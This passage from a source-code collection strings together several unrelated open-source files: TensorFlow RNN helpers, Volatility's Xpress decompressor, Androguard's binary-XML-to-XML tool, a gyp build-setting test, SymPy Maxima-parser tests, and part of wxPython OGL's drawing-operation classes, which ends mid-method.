  with ops.name_scope(
      'select_last_activations', values=[activations, sequence_lengths]):
    activations_shape = array_ops.shape(activations)
    batch_size = activations_shape[0]
    padded_length = activations_shape[1]
    num_label_columns = activations_shape[2]
    if sequence_lengths is None:
      # No explicit lengths: every row uses its final (padded_length-th)
      # timestep via the index arithmetic below.
      sequence_lengths = padded_length
    # Flatten to [batch_size * padded_length, k]; row i's last real
    # timestep then lives at flat index i * padded_length + (length_i - 1),
    # which a single gather can pick out.
    reshaped_activations = array_ops.reshape(activations,
                                             [-1, num_label_columns])
    indices = math_ops.range(batch_size) * padded_length + sequence_lengths - 1
    last_activations = array_ops.gather(reshaped_activations, indices)
    # Restore the static shape information lost by the dynamic reshape.
    last_activations.set_shape(
        [activations.get_shape()[0], activations.get_shape()[2]])
    return last_activations
def mask_activations_and_labels(activations, labels, sequence_lengths):
  """Remove entries outside `sequence_lengths` and returned flattened results.

  Args:
    activations: Output of the RNN, shape `[batch_size, padded_length, k]`.
    labels: Label values, shape `[batch_size, padded_length]`.
    sequence_lengths: A `Tensor` of shape `[batch_size]` with the unpadded
      length of each sequence. If `None`, then each sequence is unpadded.

  Returns:
    activations_masked: `logit` values with those beyond `sequence_lengths`
      removed for each batch. Batches are then concatenated. Shape
      `[tf.sum(sequence_lengths), k]` if `sequence_lengths` is not `None` and
      shape `[batch_size * padded_length, k]` otherwise.
    labels_masked: Label values after removing unneeded entries. Shape
      `[tf.sum(sequence_lengths)]` if `sequence_lengths` is not `None` and shape
      `[batch_size * padded_length]` otherwise.
  """
  with ops.name_scope(
      'mask_activations_and_labels',
      values=[activations, labels, sequence_lengths]):
    labels_shape = array_ops.shape(labels)
    batch_size = labels_shape[0]
    padded_length = labels_shape[1]
    if sequence_lengths is None:
      # Nothing is padding: simply merge the batch and time dimensions.
      flattened_dimension = padded_length * batch_size
      activations_masked = array_ops.reshape(activations,
                                             [flattened_dimension, -1])
      labels_masked = array_ops.reshape(labels, [flattened_dimension])
    else:
      # Build a [batch_size, padded_length] boolean mask that is True for
      # real timesteps and False for padding, then drop the padded ones.
      mask = array_ops.sequence_mask(sequence_lengths, padded_length)
      activations_masked = array_ops.boolean_mask(activations, mask)
      labels_masked = array_ops.boolean_mask(labels, mask)
    return activations_masked, labels_masked
def multi_value_predictions(activations, target_column, problem_type,
                            predict_probabilities):
  """Maps `activations` from the RNN to predictions for multi value models.

  If `predict_probabilities` is `False`, this function returns a `dict`
  containing single entry with key `prediction_key.PredictionKey.CLASSES` for
  `problem_type` `ProblemType.CLASSIFICATION` or
  `prediction_key.PredictionKey.SCORE` for `problem_type`
  `ProblemType.LINEAR_REGRESSION`.

  If `predict_probabilities` is `True`, it will contain a second entry with key
  `prediction_key.PredictionKey.PROBABILITIES`. The
  value of this entry is a `Tensor` of probabilities with shape
  `[batch_size, padded_length, num_classes]`.

  Note that variable length inputs will yield some predictions that don't have
  meaning. For example, if `sequence_length = [3, 2]`, then prediction `[1, 2]`
  has no meaningful interpretation.

  Args:
    activations: Output from an RNN. Should have dtype `float32` and shape
      `[batch_size, padded_length, ?]`.
    target_column: An initialized `TargetColumn`, calculate predictions.
    problem_type: Either `ProblemType.CLASSIFICATION` or
      `ProblemType.LINEAR_REGRESSION`.
    predict_probabilities: A Python boolean, indicating whether probabilities
      should be returned. Should only be set to `True` for
      classification/logistic regression problems.

  Returns:
    A `dict` mapping strings to `Tensors`.
  """
  with ops.name_scope('MultiValuePrediction'):
    activations_shape = array_ops.shape(activations)
    # Collapse batch and time so target_column sees a 2-D logits tensor.
    flattened_activations = array_ops.reshape(activations,
                                              [-1, activations_shape[2]])
    prediction_dict = {}
    if predict_probabilities:
      flat_probabilities = target_column.logits_to_predictions(
          flattened_activations, proba=True)
      flat_predictions = math_ops.argmax(flat_probabilities, 1)
      if target_column.num_label_columns == 1:
        # Single-logit case: the reshape below expects a final class axis
        # of size 2 -- presumably logits_to_predictions emits two columns
        # here (negative/positive class); confirm against TargetColumn.
        probability_shape = array_ops.concat([activations_shape[:2], [2]], 0)
      else:
        probability_shape = activations_shape
      probabilities = array_ops.reshape(
          flat_probabilities,
          probability_shape,
          name=prediction_key.PredictionKey.PROBABILITIES)
      prediction_dict[
          prediction_key.PredictionKey.PROBABILITIES] = probabilities
    else:
      flat_predictions = target_column.logits_to_predictions(
          flattened_activations, proba=False)
    predictions_name = (prediction_key.PredictionKey.CLASSES
                        if problem_type == constants.ProblemType.CLASSIFICATION
                        else prediction_key.PredictionKey.SCORES)
    # Restore the [batch_size, padded_length] layout for per-step output.
    predictions = array_ops.reshape(
        flat_predictions, [activations_shape[0], activations_shape[1]],
        name=predictions_name)
    prediction_dict[predictions_name] = predictions
    return prediction_dict
| mit |
Stan1989/volatility | volatility/win32/xpress.py | 58 | 5368 | # Volatility
# Copyright (c) 2008-2013 Volatility Foundation
# Copyright (c) 2008 Brendan Dolan-Gavitt <bdolangavitt@wesleyan.edu>
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
# The source code in this file was inspired by the work of Matthieu Suiche,
# http://sandman.msuiche.net/, and the information presented released as
# part of the Microsoft Interoperability Initiative:
# http://download.microsoft.com/download/a/e/6/ae6e4142-aa58-45c6-8dcf-a657e5900cd3/%5BMS-DRSR%5D.pdf
# A special thanks to Matthieu for all his help!
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0
@contact: bdolangavitt@wesleyan.edu
"""
#pylint: disable-msg=C0111
from struct import unpack
from struct import error as StructError
def recombine(outbuf):
    """Concatenate the values of *outbuf* (a {position: byte} dict) in
    ascending key order into a single string."""
    ordered_items = sorted(outbuf.items())
    return "".join(value for _, value in ordered_items)
def xpress_decode(inputBuffer):
    """Decompress an Xpress (LZ77-with-bitmask) compressed buffer.

    Pure-Python fallback decoder; when the optional `pyxpress` extension
    is importable it replaces this function (see the bottom of this
    module).

    NOTE(review): Python 2 only as written -- the input is indexed as a
    byte *string* (ord() on single characters) and the output is joined
    with "".join() by recombine().

    Args:
        inputBuffer: the raw compressed data.

    Returns:
        The decompressed data.  On a truncated or corrupt input the
        bytes decoded so far are returned rather than raising.
    """
    outputBuffer = {}
    outputIndex = 0
    inputIndex = 0
    indicatorBit = 0
    nibbleIndex = 0
    # we are decoding the entire input here, so I have changed
    # the check to see if we're at the end of the output buffer
    # with a check to see if we still have any input left.
    while inputIndex < len(inputBuffer):
        if indicatorBit == 0:
            # Refill the 32-bit indicator bitmap; each bit says whether the
            # next token is a literal byte (0) or a copy command (1).
            try:
                indicator = unpack("<L", inputBuffer[inputIndex:inputIndex + 4])[0]
            except StructError:
                return recombine(outputBuffer)
            inputIndex += 4
            indicatorBit = 32
        indicatorBit = indicatorBit - 1
        # check whether the bit specified by indicatorBit is set or not
        # set in indicator. For example, if indicatorBit has value 4
        # check whether the 4th bit of the value in indicator is set
        if not (indicator & (1 << indicatorBit)):
            # Literal: copy one byte straight through.
            try:
                outputBuffer[outputIndex] = inputBuffer[inputIndex]
            except IndexError:
                return recombine(outputBuffer)
            inputIndex += 1
            outputIndex += 1
        else:
            # Copy command: a 16-bit word encodes offset (high 13 bits) and
            # length (low 3 bits), with escape encodings for longer lengths
            # (nibble, then byte, then unsigned short).
            try:
                length = unpack("<H", inputBuffer[inputIndex:inputIndex + 2])[0]
            except StructError:
                return recombine(outputBuffer)
            inputIndex += 2
            # Bug fix: use explicit floor division.  For Python 2 ints
            # `//` is identical to `/`, but under Py3 semantics (or
            # `from __future__ import division`) `/` would silently yield
            # a float offset and corrupt every back-reference below.
            offset = length // 8
            length = length % 8
            if length == 7:
                if nibbleIndex == 0:
                    nibbleIndex = inputIndex
                    length = ord(inputBuffer[inputIndex]) % 16
                    inputIndex += 1
                else:
                    # get the high nibble of the last place a nibble sized
                    # length was used thus we don't waste that extra half
                    # byte :p
                    length = ord(inputBuffer[nibbleIndex]) // 16
                    nibbleIndex = 0
                if length == 15:
                    length = ord(inputBuffer[inputIndex])
                    inputIndex += 1
                    if length == 255:
                        try:
                            length = unpack("<H", inputBuffer[inputIndex:inputIndex + 2])[0]
                        except StructError:
                            return recombine(outputBuffer)
                        inputIndex = inputIndex + 2
                        length = length - (15 + 7)
                    length = length + 15
                length = length + 7
            length = length + 3
            # Back-reference copy.  The source region may overlap the bytes
            # being written, which the byte-at-a-time loop handles correctly.
            while length != 0:
                try:
                    outputBuffer[outputIndex] = outputBuffer[outputIndex - offset - 1]
                except KeyError:
                    return recombine(outputBuffer)
                outputIndex += 1
                length -= 1
    return recombine(outputBuffer)
# Prefer the optional C extension when available: pyxpress.decode is a
# drop-in, much faster replacement for the pure-Python xpress_decode.
try:
    import pyxpress #pylint: disable-msg=F0401
    xpress_decode = pyxpress.decode
except ImportError:
    # Fall back silently to the pure-Python implementation above.
    pass
if __name__ == "__main__":
    # CLI helper: decompress the file named on the command line to stdout.
    import sys
    # Open in binary mode (the input is compressed data, not text -- text
    # mode would corrupt it on Windows) and close the handle
    # deterministically instead of leaking it.
    with open(sys.argv[1], "rb") as compressed_file:
        dec_data = xpress_decode(compressed_file.read())
    sys.stdout.write(dec_data)
| gpl-2.0 |
draekko/androguard | androaxml.py | 23 | 2444 | #!/usr/bin/env python
# This file is part of Androguard.
#
# Copyright (C) 2012, Anthony Desnos <desnos at t0t0.fr>
# All rights reserved.
#
# Androguard is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Androguard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Androguard. If not, see <http://www.gnu.org/licenses/>.
import sys
from optparse import OptionParser
from xml.dom import minidom
import codecs
from androguard.core import androconf
from androguard.core.bytecodes import apk
from androguard.util import read
option_0 = { 'name' : ('-i', '--input'), 'help' : 'filename input (APK or android\'s binary xml)', 'nargs' : 1 }
option_1 = { 'name' : ('-o', '--output'), 'help' : 'filename output of the xml', 'nargs' : 1 }
option_2 = { 'name' : ('-v', '--version'), 'help' : 'version of the API', 'action' : 'count' }
options = [option_0, option_1, option_2]
def main(options, arguments):
    # Entry point: convert an APK's binary AndroidManifest.xml (or a
    # standalone Android binary XML file) to pretty-printed textual XML.
    #
    #   options.input:   path to an APK or binary .xml file
    #   options.output:  optional path to write the XML to (stdout otherwise)
    #   options.version: if set, just print the tool version
    if options.input != None:
        buff = ""
        ret_type = androconf.is_android(options.input)
        if ret_type == "APK":
            # Whole APK: extract and decode the embedded manifest.
            a = apk.APK(options.input)
            buff = a.get_android_manifest_xml().toprettyxml(encoding="utf-8")
        elif ".xml" in options.input:
            # Bare Android binary XML resource file.
            ap = apk.AXMLPrinter(read(options.input))
            buff = minidom.parseString(ap.get_buff()).toprettyxml(encoding="utf-8")
        else:
            print "Unknown file type"
            return
        if options.output != None:
            # Write as UTF-8; codecs.open keeps this Python 2 friendly.
            fd = codecs.open(options.output, "w", "utf-8")
            fd.write( buff )
            fd.close()
        else:
            print buff
    elif options.version != None:
        print "Androaxml version %s" % androconf.ANDROGUARD_VERSION
if __name__ == "__main__":
    # Build the option parser from the declarative `options` list above
    # (each dict's 'name' entry holds the flag strings), then dispatch to
    # main() with the remaining arguments restored into sys.argv.
    parser = OptionParser()
    for option in options:
        param = option['name']
        del option['name']
        parser.add_option(*param, **option)
    options, arguments = parser.parse_args()
    sys.argv[:] = arguments
    main(options, arguments)
| apache-2.0 |
sanyaade-teachings/gyp | test/make_global_settings/ar/gyptest-make_global_settings_ar.py | 67 | 3740 | #!/usr/bin/env python
# Copyright (c) 2014 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies 'AR' in make_global_settings.
"""
import os
import sys
import TestGyp
def resolve_path(test, path):
  """Translate *path* into the form the given generator writes into its
  build files; None passes through unchanged.  Fails the test for an
  unknown generator format."""
  if path is None:
    return None
  generator = test.format
  if generator == 'make':
    return '$(abspath %s)' % path
  if generator in ('ninja', 'xcode-ninja'):
    return os.path.join('..', '..', path)
  test.fail_test()
def verify_ar_target(test, ar=None, rel_path=False):
  """Check the generated build file declares the expected *target* AR.

  When *ar* is None the generator's default archiver is expected; with
  rel_path=True the given *ar* is first translated via resolve_path().
  """
  ar_expected = resolve_path(test, ar) if rel_path else ar
  if ar_expected is None:
    # No explicit AR: fall back to each generator's default.
    if test.format == 'make':
      # Make generator hasn't set the default value for AR.
      # You can remove the following assertion as long as it doesn't
      # break existing projects.
      test.must_not_contain('Makefile', 'AR ?= ')
      return
    if test.format in ('ninja', 'xcode-ninja'):
      ar_expected = 'lib.exe' if sys.platform == 'win32' else 'ar'
  if test.format == 'make':
    test.must_contain('Makefile', 'AR ?= %s' % ar_expected)
  elif test.format in ('ninja', 'xcode-ninja'):
    test.must_contain('out/Default/build.ninja', 'ar = %s' % ar_expected)
  else:
    test.fail_test()
def verify_ar_host(test, ar=None, rel_path=False):
  """Check the generated build file declares the expected *host* AR."""
  ar_expected = resolve_path(test, ar) if rel_path else ar
  # The host archiver defaults to plain 'ar' on every platform.
  if ar_expected is None:
    ar_expected = 'ar'
  if test.format == 'make':
    test.must_contain('Makefile', 'AR.host ?= %s' % ar_expected)
  elif test.format in ('ninja', 'xcode-ninja'):
    test.must_contain('out/Default/build.ninja', 'ar_host = %s' % ar_expected)
  else:
    test.fail_test()
# Script body: run gyp on the test project under several AR configurations
# and verify what each generator wrote into its build files.
test_format = ['ninja']
if sys.platform in ('linux2', 'darwin'):
  test_format += ['make']
test = TestGyp.TestGyp(formats=test_format)
# Check default values
test.run_gyp('make_global_settings_ar.gyp')
verify_ar_target(test)
# Check default values with GYP_CROSSCOMPILE enabled.
with TestGyp.LocalEnv({'GYP_CROSSCOMPILE': '1'}):
  test.run_gyp('make_global_settings_ar.gyp')
verify_ar_target(test)
verify_ar_host(test)
# Test 'AR' in 'make_global_settings'.
with TestGyp.LocalEnv({'GYP_CROSSCOMPILE': '1'}):
  test.run_gyp('make_global_settings_ar.gyp', '-Dcustom_ar_target=my_ar')
verify_ar_target(test, ar='my_ar', rel_path=True)
# Test 'AR'/'AR.host' in 'make_global_settings'.
with TestGyp.LocalEnv({'GYP_CROSSCOMPILE': '1'}):
  test.run_gyp('make_global_settings_ar.gyp',
               '-Dcustom_ar_target=my_ar_target1',
               '-Dcustom_ar_host=my_ar_host1')
verify_ar_target(test, ar='my_ar_target1', rel_path=True)
verify_ar_host(test, ar='my_ar_host1', rel_path=True)
# Test $AR and $AR_host environment variables.
with TestGyp.LocalEnv({'AR': 'my_ar_target2',
                       'AR_host': 'my_ar_host2'}):
  test.run_gyp('make_global_settings_ar.gyp')
  # Ninja generator resolves $AR in gyp phase. Make generator doesn't.
  if test.format == 'ninja':
    if sys.platform == 'win32':
      # TODO(yukawa): Make sure if this is an expected result or not.
      verify_ar_target(test, ar='lib.exe', rel_path=False)
    else:
      verify_ar_target(test, ar='my_ar_target2', rel_path=False)
  verify_ar_host(test, ar='my_ar_host2', rel_path=False)
# Test 'AR' in 'make_global_settings' with $AR_host environment variable.
with TestGyp.LocalEnv({'AR_host': 'my_ar_host3'}):
  test.run_gyp('make_global_settings_ar.gyp',
               '-Dcustom_ar_target=my_ar_target3')
verify_ar_target(test, ar='my_ar_target3', rel_path=True)
verify_ar_host(test, ar='my_ar_host3', rel_path=False)
test.pass_test()
| bsd-3-clause |
Vishluck/sympy | sympy/parsing/tests/test_maxima.py | 123 | 1647 | from sympy.parsing.maxima import parse_maxima
from sympy import Rational, Abs, Symbol, sin, cos, E, oo, log, factorial
from sympy.abc import x
n = Symbol('n', integer=True)
def test_parser():
    # Spot-check basic Maxima expressions round-tripped through parse_maxima.
    assert Abs(parse_maxima('float(1/3)') - 0.333333333) < 10**(-5)
    assert parse_maxima('13^26') == 91733330193268616658399616009
    assert parse_maxima('sin(%pi/2) + cos(%pi/3)') == Rational(3, 2)
    assert parse_maxima('log(%e)') == 1
def test_injection():
    # parse_maxima can inject the assigned name directly into the supplied
    # namespace -- here the module globals -- so `c` and `g` look unbound
    # to static analysis but exist at runtime after each call.
    parse_maxima('c: x+1', globals=globals())
    assert c == x + 1
    parse_maxima('g: sqrt(81)', globals=globals())
    assert g == 9
def test_maxima_functions():
    # Exercise a representative sample of Maxima built-ins through the
    # parser: algebra, trig, equation solving, limits, calculus and
    # sums/products (the latter via an explicit name_dict so the bound
    # variables are integer symbols).
    assert parse_maxima('expand( (x+1)^2)') == x**2 + 2*x + 1
    assert parse_maxima('factor( x**2 + 2*x + 1)') == (x + 1)**2
    assert parse_maxima('2*cos(x)^2 + sin(x)^2') == 2*cos(x)**2 + sin(x)**2
    assert parse_maxima('trigexpand(sin(2*x)+cos(2*x))') == \
        -1 + 2*cos(x)**2 + 2*cos(x)*sin(x)
    assert parse_maxima('solve(x^2-4,x)') == [-2, 2]
    assert parse_maxima('limit((1+1/x)^x,x,inf)') == E
    assert parse_maxima('limit(sqrt(-x)/x,x,0,minus)') == -oo
    assert parse_maxima('diff(x^x, x)') == x**x*(1 + log(x))
    assert parse_maxima('sum(k, k, 1, n)', name_dict=dict(
        n=Symbol('n', integer=True),
        k=Symbol('k', integer=True)
    )) == (n**2 + n)/2
    assert parse_maxima('product(k, k, 1, n)', name_dict=dict(
        n=Symbol('n', integer=True),
        k=Symbol('k', integer=True)
    )) == factorial(n)
    assert parse_maxima('ratsimp((x^2-1)/(x+1))') == x - 1
    assert Abs( parse_maxima(
        'float(sec(%pi/3) + csc(%pi/3))') - 3.154700538379252) < 10**(-5)
| bsd-3-clause |
tinkerinestudio/Tinkerine-Suite | TinkerineSuite/python/Lib/site-packages/wx-2.8-msw-unicode/wx/lib/ogl/_drawn.py | 6 | 31963 | # -*- coding: iso-8859-1 -*-
#----------------------------------------------------------------------------
# Name: drawn.py
# Purpose: DrawnShape class
#
# Author: Pierre Hjälm (from C++ original by Julian Smart)
#
# Created: 2004-08-25
# RCS-ID: $Id: _drawn.py 37267 2006-02-03 06:51:34Z RD $
# Copyright: (c) 2004 Pierre Hjälm - 1998 Julian Smart
# License: wxWindows license
#----------------------------------------------------------------------------
import os.path
from _basic import RectangleShape
from _oglmisc import *
METAFLAGS_OUTLINE = 1
METAFLAGS_ATTACHMENTS = 2
DRAWN_ANGLE_0 = 0
DRAWN_ANGLE_90 = 1
DRAWN_ANGLE_180 = 2
DRAWN_ANGLE_270 = 3
# Drawing operations
DRAWOP_SET_PEN = 1
DRAWOP_SET_BRUSH = 2
DRAWOP_SET_FONT = 3
DRAWOP_SET_TEXT_COLOUR = 4
DRAWOP_SET_BK_COLOUR = 5
DRAWOP_SET_BK_MODE = 6
DRAWOP_SET_CLIPPING_RECT = 7
DRAWOP_DESTROY_CLIPPING_RECT = 8
DRAWOP_DRAW_LINE = 20
DRAWOP_DRAW_POLYLINE = 21
DRAWOP_DRAW_POLYGON = 22
DRAWOP_DRAW_RECT = 23
DRAWOP_DRAW_ROUNDED_RECT = 24
DRAWOP_DRAW_ELLIPSE = 25
DRAWOP_DRAW_POINT = 26
DRAWOP_DRAW_ARC = 27
DRAWOP_DRAW_TEXT = 28
DRAWOP_DRAW_SPLINE = 29
DRAWOP_DRAW_ELLIPTIC_ARC = 30
class DrawOp(object):
    """Base class for one drawing operation in a drawn shape's metafile.

    Stores the DRAWOP_* operation code; subclasses override the geometry
    hooks below, which default to no-ops here.
    """

    def __init__(self, theOp):
        self._op = theOp

    def GetOp(self):
        """Return this operation's DRAWOP_* code."""
        return self._op

    def GetPerimeterPoint(self, x1, y1, x2, y2, xOffset, yOffset, attachmentMode):
        """Default: this operation contributes no perimeter point."""
        return False

    def Scale(self, scaleX, scaleY):
        """Default: nothing to scale."""
        pass

    def Translate(self, x, y):
        """Default: nothing to translate."""
        pass

    def Rotate(self, x, y, theta, sinTheta, cosTheta):
        """Default: nothing to rotate."""
        pass
class OpSetGDI(DrawOp):
    """Set font, brush, text colour."""
    def __init__(self, theOp, theImage, theGdiIndex, theMode = 0):
        DrawOp.__init__(self, theOp)
        # Index into the owning image's _gdiObjects list.
        self._gdiIndex = theGdiIndex
        # The owning drawn-shape image (holds GDI objects and the
        # outline/fill colour override lists).
        self._image = theImage
        # Background mode, used only by DRAWOP_SET_BK_MODE.
        self._mode = theMode
    def Do(self, dc, xoffset = 0, yoffset = 0):
        # Apply this state-setting operation to the device context.  The
        # offsets are unused but keep Do() signatures uniform across ops.
        # NOTE(review): the colour branches read self._r/_g/_b, which are
        # never assigned in this class -- presumably set externally when
        # the op is deserialized; confirm before relying on them.
        if self._op == DRAWOP_SET_PEN:
            # Check for overriding this operation for outline colour
            if self._gdiIndex in self._image._outlineColours:
                if self._image._outlinePen:
                    dc.SetPen(self._image._outlinePen)
            else:
                try:
                    dc.SetPen(self._image._gdiObjects[self._gdiIndex])
                except IndexError:
                    # Stale index into the GDI object list: skip silently.
                    pass
        elif self._op == DRAWOP_SET_BRUSH:
            # Check for overriding this operation for outline or fill colour
            if self._gdiIndex in self._image._outlineColours:
                # Need to construct a brush to match the outline pen's colour
                if self._image._outlinePen:
                    br = wx.Brush(self._image._outlinePen, wx.SOLID)
                    if br:
                        dc.SetBrush(br)
            elif self._gdiIndex in self._image._fillColours:
                if self._image._fillBrush:
                    dc.SetBrush(self._image._fillBrush)
            else:
                brush = self._image._gdiObjects[self._gdiIndex]
                if brush:
                    dc.SetBrush(brush)
        elif self._op == DRAWOP_SET_FONT:
            try:
                dc.SetFont(self._image._gdiObjects[self._gdiIndex])
            except IndexError:
                pass
        elif self._op == DRAWOP_SET_TEXT_COLOUR:
            dc.SetTextForeground(wx.Colour(self._r, self._g, self._b))
        elif self._op == DRAWOP_SET_BK_COLOUR:
            dc.SetTextBackground(wx.Colour(self._r, self._g, self._b))
        elif self._op == DRAWOP_SET_BK_MODE:
            dc.SetBackgroundMode(self._mode)
class OpSetClipping(DrawOp):
    """Set/destroy clipping."""

    def __init__(self, theOp, theX1, theY1, theX2, theY2):
        DrawOp.__init__(self, theOp)
        # Clipping rectangle coordinates.
        self._x1 = theX1
        self._y1 = theY1
        self._x2 = theX2
        self._y2 = theY2

    def Do(self, dc, xoffset, yoffset):
        """Apply the clipping operation to `dc` at the given offset."""
        op = self._op
        if op == DRAWOP_SET_CLIPPING_RECT:
            dc.SetClippingRegion(self._x1 + xoffset, self._y1 + yoffset,
                                 self._x2 + xoffset, self._y2 + yoffset)
        elif op == DRAWOP_DESTROY_CLIPPING_RECT:
            dc.DestroyClippingRegion()

    def Scale(self, scaleX, scaleY):
        """Scale both coordinate pairs of the clipping rectangle."""
        self._x1, self._y1 = self._x1 * scaleX, self._y1 * scaleY
        self._x2, self._y2 = self._x2 * scaleX, self._y2 * scaleY

    def Translate(self, x, y):
        # NOTE(review): only the first coordinate pair is shifted; the
        # second pair is left untouched, matching the behaviour this
        # rewrite preserves -- verify against the original C++ OGL.
        self._x1, self._y1 = self._x1 + x, self._y1 + y
class OpDraw(DrawOp):
    """Draw line, rectangle, rounded rectangle, ellipse, point, arc, text."""
    def __init__(self, theOp, theX1, theY1, theX2, theY2, theRadius = 0.0, s = ""):
        # (x1, y1) is the primary point.  The meaning of (x2, y2) depends on
        # the op: second endpoint for lines, width/height for rectangles and
        # ellipses, start point for arcs.  (x3, y3) is filled in afterwards by
        # the caller: end point for arcs, start/end angles (radians) for
        # elliptic arcs (see PseudoMetaFile.DrawArc / DrawEllipticArc).
        DrawOp.__init__(self, theOp)
        self._x1 = theX1
        self._y1 = theY1
        self._x2 = theX2
        self._y2 = theY2
        self._x3 = 0.0
        self._y3 = 0.0
        self._radius = theRadius
        self._textString = s
    def Do(self, dc, xoffset, yoffset):
        """Replay this operation on dc, shifted by (xoffset, yoffset)."""
        if self._op == DRAWOP_DRAW_LINE:
            dc.DrawLine(self._x1 + xoffset, self._y1 + yoffset, self._x2 + xoffset, self._y2 + yoffset)
        elif self._op == DRAWOP_DRAW_RECT:
            # (x2, y2) are width/height here, so no offset is added to them.
            dc.DrawRectangle(self._x1 + xoffset, self._y1 + yoffset, self._x2, self._y2)
        elif self._op == DRAWOP_DRAW_ROUNDED_RECT:
            dc.DrawRoundedRectangle(self._x1 + xoffset, self._y1 + yoffset, self._x2, self._y2, self._radius)
        elif self._op == DRAWOP_DRAW_ELLIPSE:
            dc.DrawEllipse(self._x1 + xoffset, self._y1 + yoffset, self._x2, self._y2)
        elif self._op == DRAWOP_DRAW_ARC:
            # Arguments are passed as start (x2,y2), end (x3,y3), centre (x1,y1).
            dc.DrawArc(self._x2 + xoffset, self._y2 + yoffset, self._x3 + xoffset, self._y3 + yoffset, self._x1 + xoffset, self._y1 + yoffset)
        elif self._op == DRAWOP_DRAW_ELLIPTIC_ARC:
            # (x3, y3) hold the start/end angles in radians; convert to degrees.
            dc.DrawEllipticArc(self._x1 + xoffset, self._y1 + yoffset, self._x2, self._y2, self._x3 * 360 / (2 * math.pi), self._y3 * 360 / (2 * math.pi))
        elif self._op == DRAWOP_DRAW_POINT:
            dc.DrawPoint(self._x1 + xoffset, self._y1 + yoffset)
        elif self._op == DRAWOP_DRAW_TEXT:
            dc.DrawText(self._textString, self._x1 + xoffset, self._y1 + yoffset)
    def Scale(self, scaleX, scaleY):
        """Scale the stored coordinates in place."""
        self._x1 *= scaleX
        self._y1 *= scaleY
        self._x2 *= scaleX
        self._y2 *= scaleY
        # For elliptic arcs (x3, y3) are angles, which must not be scaled.
        if self._op != DRAWOP_DRAW_ELLIPTIC_ARC:
            self._x3 *= scaleX
            self._y3 *= scaleY
        self._radius *= scaleX
    def Translate(self, x, y):
        """Shift the op by (x, y); only point-like fields are moved."""
        self._x1 += x
        self._y1 += y
        if self._op == DRAWOP_DRAW_LINE:
            self._x2 += x
            self._y2 += y
        elif self._op == DRAWOP_DRAW_ARC:
            self._x2 += x
            self._y2 += y
            self._x3 += x
            self._y3 += y
    def Rotate(self, x, y, theta, sinTheta, cosTheta):
        """Rotate the op about (x, y).

        NOTE(review): the sign conventions are inconsistent with the standard
        rotation x' = x*cos - y*sin: newX1 below uses '+ y1*sin' while newX2
        uses '- y2*sin', and the '+ x * sinTheta' term in the Y formulas is
        the opposite sign of the usual derivation.  Kept byte-identical here;
        confirm against the upstream wxWidgets OGL implementation.
        """
        newX1 = self._x1 * cosTheta + self._y1 * sinTheta + x * (1 - cosTheta) + y * sinTheta
        newY1 = self._x1 * sinTheta + self._y1 * cosTheta + y * (1 - cosTheta) + x * sinTheta
        if self._op == DRAWOP_DRAW_LINE:
            newX2 = self._x2 * cosTheta - self._y2 * sinTheta + x * (1 - cosTheta) + y * sinTheta
            newY2 = self._x2 * sinTheta + self._y2 * cosTheta + y * (1 - cosTheta) + x * sinTheta;
            self._x1 = newX1
            self._y1 = newY1
            self._x2 = newX2
            self._y2 = newY2
        elif self._op in [DRAWOP_DRAW_RECT, DRAWOP_DRAW_ROUNDED_RECT, DRAWOP_DRAW_ELLIPTIC_ARC]:
            # Assume only 0, 90, 180, 270 degree rotations.
            # oldX1, oldY1 represents the top left corner. Find the
            # bottom right, and rotate that. Then the width/height is
            # the difference between x/y values.
            oldBottomRightX = self._x1 + self._x2
            oldBottomRightY = self._y1 + self._y2
            newBottomRightX = oldBottomRightX * cosTheta - oldBottomRightY * sinTheta + x * (1 - cosTheta) + y * sinTheta
            newBottomRightY = oldBottomRightX * sinTheta + oldBottomRightY * cosTheta + y * (1 - cosTheta) + x * sinTheta
            # Now find the new top-left, bottom-right coordinates.
            minX = min(newX1, newBottomRightX)
            minY = min(newY1, newBottomRightY)
            maxX = max(newX1, newBottomRightX)
            maxY = max(newY1, newBottomRightY)
            self._x1 = minX
            self._y1 = minY
            self._x2 = maxX - minX # width
            self._y2 = maxY - minY # height
            if self._op == DRAWOP_DRAW_ELLIPTIC_ARC:
                # Add rotation to angles
                # NOTE(review): theta is the absolute target angle as passed by
                # PseudoMetaFile.Rotate, while sin/cos are of the delta -- confirm
                # adding the absolute angle here is intended.
                self._x3 += theta
                self._y3 += theta
        elif self._op == DRAWOP_DRAW_ARC:
            newX2 = self._x2 * cosTheta - self._y2 * sinTheta + x * (1 - cosTheta) + y * sinTheta
            newY2 = self._x2 * sinTheta + self._y2 * cosTheta + y * (1 - cosTheta) + x * sinTheta
            newX3 = self._x3 * cosTheta - self._y3 * sinTheta + x * (1 - cosTheta) + y * sinTheta
            newY3 = self._x3 * sinTheta + self._y3 * cosTheta + y * (1 - cosTheta) + x * sinTheta
            self._x1 = newX1
            self._y1 = newY1
            self._x2 = newX2
            self._y2 = newY2
            self._x3 = newX3
            self._y3 = newY3
class OpPolyDraw(DrawOp):
    """Draw polygon, polyline, spline from a stored point list."""

    def __init__(self, theOp, thePoints):
        DrawOp.__init__(self, theOp)
        self._noPoints = len(thePoints)
        self._points = thePoints

    def Do(self, dc, xoffset, yoffset):
        """Replay this op on dc, shifted by (xoffset, yoffset)."""
        if self._op == DRAWOP_DRAW_POLYLINE:
            dc.DrawLines(self._points, xoffset, yoffset)
        elif self._op == DRAWOP_DRAW_POLYGON:
            dc.DrawPolygon(self._points, xoffset, yoffset)
        elif self._op == DRAWOP_DRAW_SPLINE:
            dc.DrawSpline(self._points) # no offsets in DrawSpline

    def Scale(self, scaleX, scaleY):
